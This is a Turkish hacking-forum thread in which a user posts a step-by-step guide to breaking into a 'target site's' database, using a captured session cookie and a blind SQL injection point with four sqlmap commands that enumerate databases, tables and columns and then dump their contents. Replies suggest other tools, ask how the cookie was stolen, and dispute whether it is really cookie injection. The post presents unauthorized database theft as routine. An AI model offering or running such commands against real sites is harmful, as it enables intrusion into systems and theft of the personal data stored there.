THT DUYURU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

takipci
chat
Seçenekler

Blind SQL & Cookie İnjection Açığı Kullanımı (Video)

meteduman - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2019
Nereden:
İzmir
Mesajlar:
34
Konular:
1
Teşekkür (Etti):
1
Teşekkür (Aldı):
5
Ticaret:
(0) %
8
2857
28-03-2019 16:35
#1
Blind SQL & Cookie İnjection Açığı Kullanımı (Video)


İstek Üzerine yazılı kısa bir anlatım yapacagım arkadaşlar.
Hedef sitemizin cookie'sini çektiğinizi ve blind SQL-i açığını buldugunuzu varsayarak anlatımıma geçiyorum.Aslında tek yaptıgımız şey --cookie parametresi ile hedef sitenin cookiesini tanımlayıp blind açığımız ile hedef sitemizin veritabanına sızmaktı..

Peki nasıl yaptık ?


Burada cookie bilgisini ve Blind SQL-i açığını tanımladık ve veritabanını çektik.

Kod:
sqlmap --cookie="cookiebilgisi" -u "Blind SQL-i" --dbs

Burada çektiğimiz veritabanının içerisindeki tableları çektik.

Kod:
sqlmap --cookie="cookiebilgisi" -u "Blind SQL-i" -D database --Tables

Burada tableların içerisindeki Column'ları çektik.

Kod:
sqlmap --cookie="cookiebilgisi" -u "Blind SQL-i" -D database -T tables --columns

Son olarak columnlarımızın içerisindeki bilgiyi çekiyoruz.

Kod:
sqlmap --cookie="cookiebilgisi" -u "Blind SQL-i" -D database -T tables -C columns --dump



Anlamadıgınız olursa sorabilirsiniz.

Teşekkür Ederim.
Konu meteduman tarafından (28-03-2019 20:05 Saat 20:05 ) değiştirilmiştir.
Kacamax, nessina, Nems Teşekkür etti.
korkusuzhacker2 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2019
Nereden:
KONYA
Mesajlar:
85
Konular:
36
Teşekkür (Etti):
7
Teşekkür (Aldı):
6
Ticaret:
(0) %
28-03-2019 17:47
#2
Devrem
Havij kullanirsan daha çok işine yarar
meteduman - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2019
Nereden:
İzmir
Mesajlar:
34
Konular:
1
Teşekkür (Etti):
1
Teşekkür (Aldı):
5
Ticaret:
(0) %
28-03-2019 17:52
#3
Alıntı:
korkusuzhacker2´isimli üyeden Alıntı Mesajı göster
Devrem
Havij kullanirsan daha çok işine yarar

Video eğitim amaçlı kardom bilmeyenleri bilgilendirmek amacıyla çektiğim bir video bu ayrıca bu yöntemi havijle yapabiliceğine inanıyormusun
"PurpposoLes - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2016
Nereden:
DataBase
Mesajlar:
3.285
Konular:
268
Teşekkür (Etti):
948
Teşekkür (Aldı):
1081
Ticaret:
(0) %
28-03-2019 17:56
#4
Alıntı:
meteduman´isimli üyeden Alıntı Mesajı göster
Video eğitim amaçlı kardom bilmeyenleri bilgilendirmek amacıyla çektiğim bir video bu ayrıca bu yöntemi havijle yapabiliceğine inanıyormusun
Havij mi ? keşke cookies i nasıl çektiğini gösterseydin bilmeyenler veya soranlar olabilir
---------------------
ɱყ ŋąɱɛ ıʂ "℘ųཞ℘℘ơʂơƖɛʂ
ı'ɱ ą ცƖąƈƙ ɧąɬ

Öʅüɱʂüȥ αşƙʅαɾ ʋαɾԃα, öʅɱҽყҽɳ αşıƙ ʋαɾ ɱı?

єѕкι αηкα тιмι αѕιѕтαηı..
Konu PALA tarafından (29-03-2019 00:50 Saat 00:50 ) değiştirilmiştir.
meteduman - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2019
Nereden:
İzmir
Mesajlar:
34
Konular:
1
Teşekkür (Etti):
1
Teşekkür (Aldı):
5
Ticaret:
(0) %
28-03-2019 18:11
#5
Alıntı:
PurpposoLes;8715985][COLOR="White´isimli üyeden Alıntı
Havij mi ? Konu güzel olmuş keşke cookies i nasıl çektiğini gösterseydin bilmeyenler veya soranlar olabilir emeğine sağlık. [/COLOR]

Teşekkür ederim bilgi analizleri için kullanılan programlar ve manuel açık kullanımları için ayrı bir video çekeceğim için göstermedim ama yeni video birkaç güne gelecek inşallah.
RuinHeart - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2019
Mesajlar:
1
Konular:
0
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Ticaret:
(0) %
28-03-2019 18:40
#6
Get parametresine atak yapmışsın dostum,cookie injection değil bu.Cookie injection dediğin zaman Cookie Parametresine Sql Payloadları Yazarsın ve Responsede dönen sonuçları incelersin.Sen sadece burda Cookie bilgisi girerek get parametresinden veritabınına ulaşmışsın.
meteduman - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2019
Nereden:
İzmir
Mesajlar:
34
Konular:
1
Teşekkür (Etti):
1
Teşekkür (Aldı):
5
Ticaret:
(0) %
28-03-2019 19:38
#7
Alıntı:
RuinHeart´isimli üyeden Alıntı Mesajı göster
Get parametresine atak yapmışsın dostum,cookie injection değil bu.Cookie injection dediğin zaman Cookie Parametresine Sql Payloadları Yazarsın ve Responsede dönen sonuçları incelersin.Sen sadece burda Cookie bilgisi girerek get parametresinden veritabınına ulaşmışsın.

Senin bahsettiğin şey ile benim yaptıgım şey alakasız şeyler bahsettiğini anladım fakat bu yöntemede cookie injection deniyor bazı kaynaklarda bana ne yaptıgımı anlatmana gerek yok yani yapıp videosunu çektiğime göre ne yaptıgımıda biliyorum demekki değil mi kardom ?
cewl - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Merdekan
Yaş:
25
Mesajlar:
2.827
Konular:
186
Teşekkür (Etti):
1
Teşekkür (Aldı):
780
Ticaret:
(0) %
28-03-2019 19:47
#8
merhaba konu gozel lap gozel olacakdi amma olmadi bi dusun yazili anlatsan bu videonuda alta eklesen ne kadar guzel olr dimi (:
meteduman - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2019
Nereden:
İzmir
Mesajlar:
34
Konular:
1
Teşekkür (Etti):
1
Teşekkür (Aldı):
5
Ticaret:
(0) %
28-03-2019 20:08
#9
Alıntı:
cewl´isimli üyeden Alıntı Mesajı göster
merhaba konu gozel lap gozel olacakdi amma olmadi bi dusun yazili anlatsan bu videonuda alta eklesen ne kadar guzel olr dimi (:

Yazılı Anlatım eklendi .
Konu PALA tarafından (28-03-2019 21:00 Saat 21:00 ) değiştirilmiştir.
nessina Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler





1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291